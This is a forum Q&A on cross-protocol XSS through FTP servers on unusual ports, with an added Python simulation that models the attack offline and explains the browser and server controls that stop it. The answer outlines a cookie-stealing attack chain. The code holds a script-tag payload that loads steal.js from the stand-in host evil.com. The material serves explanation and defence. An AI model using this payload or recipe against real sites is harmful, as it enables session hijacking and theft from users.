Cross-protocol XSS with non-standard service ports

Hi guys,

I just read this post about really nasty (and cool at the same time) ways to perform XSS. However, there is still something unclear to me.

I understand the full concept of the attack; however, I don't see how this can potentially be exploited. The "action" attribute inside the form must point to an FTP server (or any other server that reflects input), but this is never the case.

So unless you have another XSS hole to inject such a form, this vulnerability cannot be exploited. My question is whether my conclusion that it cannot be exploited is true, or whether I'm missing something.

Henri asked Oct 27 '22 02:10


1 Answer

This is exploitable as follows.

  • MrCrim wants to steal the login of someone that uses victim.net
  • MrCrim notices that victim.net is running an ftp server on an unusual port
  • MrCrim puts up a form on his own site, evil.com
  • The form contains the "ftp commands" in the form elements and its post action is to victim.net
  • MrCrim writes a JS script that steals document.cookie from a site and hosts that script in a .js file on evil.com. It probably works by including the cookie string as part of an image source URL that is requested from evil.com
  • One of the "ftp commands" in MrCrim's form is constructed to write a small bit of JS that executes MrCrim's cookie-stealing script
  • MrCrim tempts people to look at evil.com by posting links on forums and sending spam.
  • UnsuspectingUser follows a link posted in his favourite forum and lands at evil.com. He posts the form, not knowing of its evil and wily intentions
  • UnsuspectingUser is now on victim.net and Bam! the JS "injected" by the FTP server is executed and UnsuspectingUser's cookie for victim.net gets sent to evil.com
  • Profit! :-)
Cheekysoft answered Jan 02 '23 20:01
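The scenario in the answer above, modelled end to end as an added example (this is not code from the original post or from the linked article). It assumes hypothetical hosts evil.com and victim.net, an FTP daemon on victim.net that quotes unrecognised commands back in its 500 reply, and an attack form using enctype="text/plain" so the script tag is not URL-encoded in the POST body. Nothing touches the network: the browser's HTTP request and the daemon's line-by-line replies are both simulated in-process so the reflection can be inspected, together with the two things that stop it (a browser-blocked port, or a daemon that does not echo its input).

```python
"""Added walk-through of the cross-protocol XSS described in the answer.

Hypothetical hosts: evil.com (attacker) and victim.net (FTP daemon on an
unusual port).  Nothing here talks to the network; the browser's request and
the FTP daemon's replies are both modelled in-process.
"""

# Well-known ports that Chrome and Firefox refuse to connect to from a page;
# 21 (FTP) is on both lists, which is exactly why the attack needs an FTP
# daemon on a non-standard port.  (Subset of the real lists.)
BROWSER_BLOCKED_PORTS = {21, 22, 23, 25, 110, 143, 465, 587}

# Attacker-chosen form field value; steal.js is a hypothetical cookie stealer.
PAYLOAD = '<script src="http://evil.com/steal.js"></script>'


def build_http_post(host, port, fields):
    """Lines of the request a browser sends for a form posted to host:port.

    The form is assumed to use enctype="text/plain", so each field arrives as
    'name=value' on its own line with no URL-encoding of '<' or '"'.
    """
    body_lines = [f"{name}={value}" for name, value in fields.items()]
    body = "".join(line + "\r\n" for line in body_lines)
    return [
        "POST / HTTP/1.1",
        f"Host: {host}:{port}",
        "Content-Type: text/plain",
        f"Content-Length: {len(body.encode())}",
        "",                      # blank line ends the HTTP headers
        *body_lines,
    ]


KNOWN_VERBS = {"USER", "PASS", "QUIT", "NOOP", "HELP"}


def ftp_reply(line, echo_input):
    """Toy FTP command loop: one reply per input line, as a real daemon would.

    'echo_input' models the daemon quoting the offending line back in its
    500 error; that echo is the reflection the attack depends on.
    """
    verb = line.split(" ", 1)[0].upper()
    if verb in KNOWN_VERBS:
        return f"200 {verb} accepted"
    if echo_input:
        return f"500 '{line}': command not understood"
    return "500 Syntax error, command unrecognized"


def ftp_session(request_lines, echo_input=True):
    """Feed every line of the browser's HTTP request to the FTP daemon."""
    replies = ["220 victim.net FTP server ready"]
    replies += [ftp_reply(line, echo_input) for line in request_lines]
    return "\r\n".join(replies) + "\r\n"


def reflects_script(response):
    """True when the daemon's reply carries the script tag back to the browser."""
    return PAYLOAD in response


def run_attack(port, echo_input=True):
    """Simulate a victim submitting the evil.com form; None if the browser refuses."""
    if port in BROWSER_BLOCKED_PORTS:
        return None
    request = build_http_post("victim.net", port, {"cmd": PAYLOAD})
    return ftp_session(request, echo_input)


if __name__ == "__main__":
    print("port 21 ->", run_attack(21))            # browser blocks the connection
    reply = run_attack(2121)
    print("port 2121 reflects script:", reflects_script(reply))
    print(reply)
    print("non-echoing daemon reflects:",
          reflects_script(run_attack(2121, echo_input=False)))
```

The reply from the daemon does not start with "HTTP/", so the browser treats it as a header-less (HTTP/0.9-style) response and content-sniffs the text, which is how the reflected script tag runs in victim.net's origin. Two independent controls break the chain: the browser's restricted-port list, which is why a daemon on port 21 is not reachable but one on 2121 is, and a daemon that reports a syntax error without quoting the input back, which is the `echo_input=False` case. Chromium has since also stopped accepting header-less responses on non-default ports, which closes the sniffing half of the attack in current Chrome builds.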